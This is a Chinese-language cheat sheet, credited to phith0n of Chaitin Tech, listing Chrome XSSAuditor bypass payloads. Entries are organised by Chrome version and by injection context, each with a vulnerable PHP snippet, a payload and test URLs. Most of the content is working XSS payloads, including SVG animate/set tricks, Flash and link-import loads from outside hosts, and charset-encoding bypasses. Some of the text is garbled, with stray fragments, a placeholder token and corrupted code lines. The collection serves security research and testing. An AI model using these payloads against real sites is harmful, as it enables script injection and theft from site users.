作者:phith0n@长亭科技
Universal Bypass 5
最新版 Chrome 60
context = null
test
Bypass 4 (需交互的bypass)
chrome 60
?c=<svg><animate href=#x attributeName=href values= javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
// or
?c=<svg width=10000px height=10000px><a><rect width=10000px height=10000px z-index=9999999 /><animate attributeName=href values=javascript:alert(1)>test
Bypass 3 via flash
只要支持flash的chrome版本(到Chrome 56),均可使用。
context = support flash
<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>test
Universal Bypass 2
到Chrome 55/56可用, 无任何条件,只要输出在页面中即可执行代码。
context = null
?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3EUniversal Bypass 1
到Chrome 55/56可用,无任何条件,只要输出在页面中即可执行代码。
context = null
?xss=<link rel="import" href="https:www.leavesongs.com/testxss"test
Chrome 59 && 输出点后面有空格的情况
context:
<?php
header('X-XSS-Protection: 1; mode=block');
echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";test
http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script
Chrome 44/45 + 属性中输出的情况
https://code.google.com/p/chromium/issues/detail?id=526104
chrome 45+ fixed
context:
<html>
<head>
<title>XSSAuditor bypass</title>
</head>
<body>
<form>
<input type="text" value="<?php echo isset($_GET['input']) ? $_GET['input'] : 'use ?input=foo'?>">
</form>
</body>
</html>payload:
"><script>prompt(/XSS/);1%02<script</script>test
无charset Bypass
没有输出charset的情况下,可以通过制定字符集来绕过auditor。
老版的这个编码:ISO-2022-KR,可用 onerror%0f=alert(1) bypass,但现在版本已经没用这个编码,所以该payload只适用于老版本chrome。
新版中,有这个编码:ISO-2022-JP,可以在关键处中加入 %1B%28B,会被省略。
context:
<?php
echo $_GET['xss'];payload:
老版:
xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%0f=alert(1)%3E新版:
xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3Etest:
输出在属性中,并且后面还有<script>的情况
context:
<!doctype HTML>
<img alt="<?php echo $_GET['xss']; ?>">
<script> y = "abc"; </script>payload
{gfm-js-extract-pre-1}test
双输出点的情况
context:
<?php
// Echo the value of parameter one
echo "This is text1:".$_GET['text1']."<br><br>";
// Echo the value of parameter two
echo "This is text2:".$_GET['text2']."<br><br>";
?>payload:
http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script>
http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E
Chrome 43 XSSAuditor bypass
大概2015-06-23以前的版本均可。
context = 全部情况
payload:
xss=<svg><script>/<1/>alert(document.domain)</script></svg>test
Chrome 36~40 link 导入html导致bypass
Fixed on Oct 10, 2014.(实际上15年初还存在)
https://code.google.com/p/chromium/issues/detail?id=421166
http://www.wooyun.org/bugs/wooyun-2010-090304
由于link导入外部html导致XSSAuditor绕过。
context = 全部情况
payload
xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>test
输出在script内字符串位置的情况
如果允许闭合字符串,直接闭合并写入javascript即可,如:
http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
但如果不能闭合单引号呢?如这个context
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>all</title>
<script type="text/javascript">
var a = '<?php echo addslashes($_GET["xss"]); ?>';
</script>
</head>
<body>
123
</body>
</html>payload
<script>
x = "</script><svg><script>alert(1)+"";
<script>
x = "</script><svg><script>alert(1)+'";test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//
有可控上传点的通用Bypass
context:
网站域名下有可控的上传点,我可以上传一个.txt或.js等文件(只要不是媒体文件,其他文件均可,比如上传是黑名单验证的,可以随便写个后缀)。再引入script标签的src属性即可。
payload
xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3Etest
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E
JSON Encode
context
<?=json_encode($_GET['x'])?>payload
?x=<img+src=x+onerror=`ö`-alert(1)>存在字符替换的情况
当输出点在输出前存在字符(大部分字符,字符串什么的都可以)的替换,context如下:
<?php
echo str_replace('"', '"e;', $_REQUEST['name']);
echo str_replace('&', '&', $_REQUEST['name']);
echo str_replace('\', '\', $_REQUEST['name']);
echo str_replace('#', '#', $_REQUEST['name']);
echo str_replace('xxxx', 'b', $_REQUEST['name']);既可以在payload里带入该字符进行绕过auditor:
xss=<script>'"'/alert(1)</script>test
http://mhz.pw/game/xss/amps.php?name=zx%3Cscript%3E%27%26%27/alert(1)%3C/script%3Eczxc